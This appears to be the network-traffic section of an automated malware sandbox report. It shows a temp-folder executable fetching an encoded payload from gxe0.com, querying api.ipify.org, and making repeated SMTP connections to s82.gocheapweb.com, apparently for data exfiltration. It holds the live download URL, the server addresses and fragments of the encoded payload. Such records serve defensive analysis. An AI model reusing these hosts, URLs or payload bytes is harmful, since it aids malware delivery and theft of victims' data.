Nov 21, 2024 17:04:10.635910988 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:10.755490065 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.039117098 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.039644003 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.039644003 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.039752960 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.039752960 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.040915966 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.159172058 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.159251928 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.159296036 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.159329891 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.159369946 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160507917 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160512924 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160610914 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160614967 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160697937 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160702944 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160729885 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.160729885 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.160763979 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.160774946 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160813093 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.160873890 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160917997 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.160923958 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.160969973 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.161138058 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.279113054 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.279474974 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.280250072 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.280363083 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.280450106 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.280503035 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.280539036 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.280666113 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.280719995 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.280859947 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.280867100 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.281016111 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.281017065 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.281056881 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.281136036 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.281286955 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.323108912 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.323723078 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.399115086 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.399231911 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.400531054 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.400645018 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.400650024 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.400655985 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:11.400719881 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.400810003 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.400937080 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.400978088 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401089907 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401099920 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401201010 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401215076 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401284933 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401288033 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401325941 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401329994 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401355982 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401360035 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401447058 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401451111 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401557922 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.401566029 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.443428040 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.443460941 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.518726110 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.518748045 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.518779993 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.518954039 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.520104885 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:11.953655005 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:12.079356909 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:12.113243103 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:12.233027935 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:12.528028011 CET	587	49995	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:12.528837919 CET	49995	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:12.530762911 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:12.650239944 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:12.650330067 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:13.969471931 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:13.969623089 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:14.089231014 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:14.387814045 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:14.388119936 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:14.507708073 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:14.806406021 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:14.806797981 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:14.927161932 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:15.232568026 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:15.232604027 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:15.232616901 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:15.232687950 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:21.642606020 CET	49993	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:21.762185097 CET	587	49993	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:22.280354977 CET	587	49993	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:22.280725956 CET	49993	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:22.280998945 CET	49997	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:22.403906107 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:22.404165030 CET	49997	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:23.252331018 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:23.345490932 CET	49998	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:23.371877909 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:23.465123892 CET	587	49998	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:23.465215921 CET	49998	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:23.670053005 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:23.671077013 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:23.671268940 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:23.719291925 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:23.719635010 CET	49997	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:23.792239904 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:23.792476892 CET	587	49996	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:23.792642117 CET	49996	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:23.839545012 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.137075901 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.137295008 CET	49997	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:24.257800102 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.556061983 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.556396008 CET	49997	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:24.676004887 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.732275963 CET	587	49998	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.732393026 CET	49998	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:24.857439041 CET	587	49998	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.983284950 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.983361006 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.983378887 CET	587	49997	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:24.983444929 CET	49997	587	192.168.2.10	51.195.88.199
Nov 21, 2024 17:04:25.147684097 CET	587	49998	51.195.88.199	192.168.2.10
Nov 21, 2024 17:04:25.188780069 CET	49998	587	192.168.2.10	51.195.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 17:00:11.429688931 CET	58471	53	192.168.2.10	1.1.1.1
Nov 21, 2024 17:00:11.981106997 CET	53	58471	1.1.1.1	192.168.2.10
Nov 21, 2024 17:00:24.599143028 CET	50877	53	192.168.2.10	1.1.1.1
Nov 21, 2024 17:00:24.736356974 CET	53	50877	1.1.1.1	192.168.2.10
Nov 21, 2024 17:00:27.998935938 CET	49447	53	192.168.2.10	1.1.1.1
Nov 21, 2024 17:00:28.313219070 CET	53	49447	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 17:00:11.429688931 CET	192.168.2.10	1.1.1.1	0xda37	Standard query (0)	gxe0.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 17:00:24.599143028 CET	192.168.2.10	1.1.1.1	0x9d24	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 21, 2024 17:00:27.998935938 CET	192.168.2.10	1.1.1.1	0x83e2	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 17:00:04.524730921 CET	1.1.1.1	192.168.2.10	0xa750	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 21, 2024 17:00:04.524730921 CET	1.1.1.1	192.168.2.10	0xa750	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Nov 21, 2024 17:00:11.981106997 CET	1.1.1.1	192.168.2.10	0xda37	No error (0)	gxe0.com		198.252.105.91	A (IP address)	IN (0x0001)	false
Nov 21, 2024 17:00:24.736356974 CET	1.1.1.1	192.168.2.10	0x9d24	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 21, 2024 17:00:24.736356974 CET	1.1.1.1	192.168.2.10	0x9d24	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 21, 2024 17:00:24.736356974 CET	1.1.1.1	192.168.2.10	0x9d24	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 21, 2024 17:00:28.313219070 CET	1.1.1.1	192.168.2.10	0x83e2	No error (0)	s82.gocheapweb.com		51.195.88.199	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gxe0.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49713	198.252.105.91	443	8084	C:\Users\user\AppData\Local\Temp\x.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 16:00:13 UTC	161	OUT	GET /yak/233_Wisrysxlfss HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: gxe0.com
2024-11-21 16:00:14 UTC	365	IN	HTTP/1.1 200 OK Connection: close last-modified: Mon, 28 Oct 2024 23:14:08 GMT accept-ranges: bytes content-length: 2562520 date: Thu, 21 Nov 2024 16:00:13 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-21 16:00:14 UTC	1003	IN	Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 51 48 43 59 6b 48 42 41 6e 47 69 4d 6e 46 78 4d 56 4a 52 38 51 44 68 73 67 4a 53 49 67 48 78 49 58 44 68 55 61 49 42 59 61 4a 68 38 52 48 78 49 66 4a 68 77 5a 4a 43 49 6c 44 69 4d 6b 4a 79 4d 66 48 68 6b 61 4a 78 51 51 44 68 41 63 45 53 41 6e 4a 52 30 6c 49 52 51 50 46 69 41 51 4a 52 49 6e 4a 79 49 69 48 53 41 69 49 79 49 52 4a 52 59 63 4a 68 67 6d 48 51 38 52 46 78 49 63 48 42 63 6c 44 78 51 65 44 67 38 58 48 78 77 4f 49 69 45 65 48 52 4d 6a 4a 78 32 6d 72 71 56 5a 49 36 65 78 53 77 51 57 49 42 38 6d 49 43 55 5a 45 79 41 67 70 71 36 6c 57 53 4f 6e 73 55 75 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 Data Ascii: pq6lWSOnsUsQHCYkHBAnGiMnFxMVJR8QDhsgJSIgHxIXDhUaIBYaJh8RHxIfJhwZJCIlDiMkJyMfHhkaJxQQDhAcESAnJR0lIRQPFiAQJRInJyIiHSAiIyIRJRYcJhgmHQ8RFxIcHBclDxQeDg8XHxwOIiEeHRMjJx2mrqVZI6exSwQWIB8mICUZEyAgpq6lWSOnsUupnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbe
2024-11-21 16:00:14 UTC	14994	IN	Data Raw: 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 Data Ascii: muKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uq
2024-11-21 16:00:14 UTC	16384	IN	Data Raw: 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 Data Ascii: 7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mp
2024-11-21 16:00:14 UTC	16384	IN	Data Raw: 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 Data Ascii: qOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1
2024-11-21 16:00:14 UTC	16384	IN	Data Raw: 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 Data Ascii: rmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5
2024-11-21 16:00:14 UTC	16384	IN	Data Raw: 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 Data Ascii: Ke4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0
2024-11-21 16:00:14 UTC	16384	IN	Data Raw: 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a Data Ascii: KSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6Gz
2024-11-21 16:00:14 UTC	16384	IN	Data Raw: 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 Data Ascii: 6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqy
2024-11-21 16:00:14 UTC	16384	IN	Data Raw: 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 Data Ascii: 